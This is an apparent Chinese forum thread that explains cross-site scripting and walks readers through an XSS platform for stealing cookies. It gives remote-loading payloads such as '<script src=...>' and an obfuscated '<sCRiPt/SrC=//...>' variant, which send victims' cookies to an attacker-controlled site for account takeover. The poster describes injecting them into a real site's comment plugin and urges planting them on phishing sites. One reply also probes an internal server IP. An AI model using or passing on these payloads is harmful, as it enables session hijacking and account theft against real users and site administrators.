下面是我使用的xss平台
在“我的项目”那里创建一个项目,如getcookie2,点击下一步,选择模块,我只需要cookie所以选择默认模块就行了
配置好后,点击浏览代码,上面会介绍你怎么插入xss语句:
复制这些语句,如下面的两条,然后再去找可以XSS的网站
XSS是跨站脚本攻击的别称(英文为Cross Site Scripting,但通常写成XSS以便于和另一项网页技术级联样式表CSS区分开),那么XSS技术可以用来干什么呢?
可以拿来盗号!!!!
就在几年前相信大家都有着这样的经历或者听说过这样的案例,点开某人的QQ空间后,自己的QQ账号就莫名其妙地去发一些H广告甚至被盗了,而就在去年,百度贴吧也是几乎一瞬间多了一堆奇怪的帖子,只要点进去后,自己的账号也开始自动开始狂发这种帖子,如果是吧务点进去后,大吧主会开掉小吧主,小吧主们互相封禁。。。。前者就是XSS攻击的实例,后者更为恶劣并且更加高级,这已经一种自动化并且能传播形式的攻击了,这就是XSS蠕虫。
盗号的受害者也并不一定是用户,因为网站的管理员也是一个超级用户,如果管理员被盗号,那么损失的是整个网站
现代的网页是由HTML语言和JavaScript脚本构成的,JavaScript可以嵌入到HTML文件里面,比如<script>alert("hello")</script>这样的语句,如果写到HTML文件里面,浏览器遇到<script></script>这样的标签就会执行里面的内容,这段代码是弹出一个窗口显示“hello”。
而网站或者论坛上面通常会有一些留言板块,这些板块的原理是把你写的内容提交到网站的数据库里面,然后第二个人浏览的时候,把数据库里面的信息查询出来返回给第二个用户浏览器,这个用户的浏览器在把这些内容渲染出来。
像下面的这个板块:
那么如果发帖的用户是黑阔,发的是一段JavaScript代码,如下面这样,第二个用户浏览了会怎么样呢?
结果是弹出一个框来
为什么会弹出框呢,可以关掉这个框用选中发帖内容右键-查看源代码看看黑阔发的贴变成了什么代码
看见没有,原来发的代码<script>alert()</script>变成了网页内容的一部分了,浏览器把它当做JavaScript命令执行了,自然会弹出一个框来。
但是我的这篇文章发了出来,里面有那么多<script>alert()</script>,为什么科创又不会弹出窗口呢?
原因是科创使用的phpwind系统在发帖的时候做了过滤,把尖括号给转义了,变成了<script>alert()</script>这样的代码,这样你的浏览器就把这些<script>alert()</script>当做普通文字处理了。这样你也就安全了。
如果只是弹一个框,感觉似乎没有什么用,可是我们把XSS语句改成这样的语句呢
<script src=XXXXXXXXXXX/RLfh4wn></script>
从代码上看,这段语句调用 了一个不知名的网站上面的链接(XXXX是一个生成的短链接,可以用新浪生成),这个链接实际上是一个JavsScript脚本,它会干很多事情,其中就包括获取你的cookie,然后发送到另一个网站上面去。
这段脚本在后台悄悄地执行,不会弹框,你不会发现任何痕迹。
黑阔获取了你的cookie之后,就可以利用你的cookie伪造登陆,然后动用你的账号做任何事情了
[修改于 3年4个月前 - 2021/07/20 16:53:41]
引用 wenjizu:见笑了,这些算是小技吧,人非生而知之,不断学习
我发现你好像啥都懂,啥都搞,好厉害的的样子,佩服
引用 smith:卧槽,是“多说”留言插件,很多网站都用了
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句
引用 celeron533:没在意这个网站插件的版本,估计也是比较旧的版本吧,如果最新的也有那就给人玩烂了。
卧槽,是“多说”留言插件,很多网站都用了
引用 smith:看了一下XXXXXXXXXXX/RLfh4wn 没看懂
顺便说一下下次大家遇到钓鱼诈骗的网站,就在地址等信息的地方填XSS语句,填
<script src="XXXXXXXXXXX/RLfh4wn"></script>
这样的,不要填Alert,不要输入自己的真实信息
然后骗子...
引用 smith:感觉好熟悉,似乎是某某医保网站
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句
引用 哈哈哥:做路人甲就行了,乌云是个不错的平台——我也是路人甲,有时候没必要去争那个名,做个灰帽子娱乐娱乐就行了
楼主能给弄个乌云的账号吗?
<sCRiPt/SrC=//XXXXX/w1t
让我试试看
2334
提交了外链图片 但是评论区看不到 点击编辑评论才可以看见
前台评论是根据提交的data id来生成的
<img data-global-click="viewImage" data-global-long-press="downloadFile" data-global-data="{"name":"XXXXXXXXXXXXXXXXg","url":"XXXXXXXXXXXXXXXXXXXXXXXX:81/r/357775?c=resource&t=lg","height":838,"width":1536}" data-src="XXXXXXXXXXXXXXXXXXXXXXXX:81/r/357775?c=resource" alt="XXXXXXXXXXXXXXXXg" data-type="view" dataimg="content" class="lazyload">
应该是科创的一个有关图片储存 的服务器ip,和 XXXXXXXXXXXX 解析的ip 182.150.31.225相邻 可以ping通 但是好像没有开放端口算是一个内网机
时段 | 个数 |
---|---|
{{f.startingTime}}点 - {{f.endTime}}点 | {{f.fileCount}} |
200字以内,仅用于支线交流,主线讨论请采用回复功能。